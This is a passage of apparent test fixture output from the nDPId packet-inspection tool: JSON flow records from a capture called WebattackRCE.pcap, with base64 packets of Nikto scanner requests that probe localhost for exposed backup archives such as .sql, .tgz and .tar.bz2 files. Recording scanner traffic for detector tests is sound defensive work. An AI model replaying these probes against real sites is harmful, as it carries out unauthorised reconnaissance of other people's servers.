Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
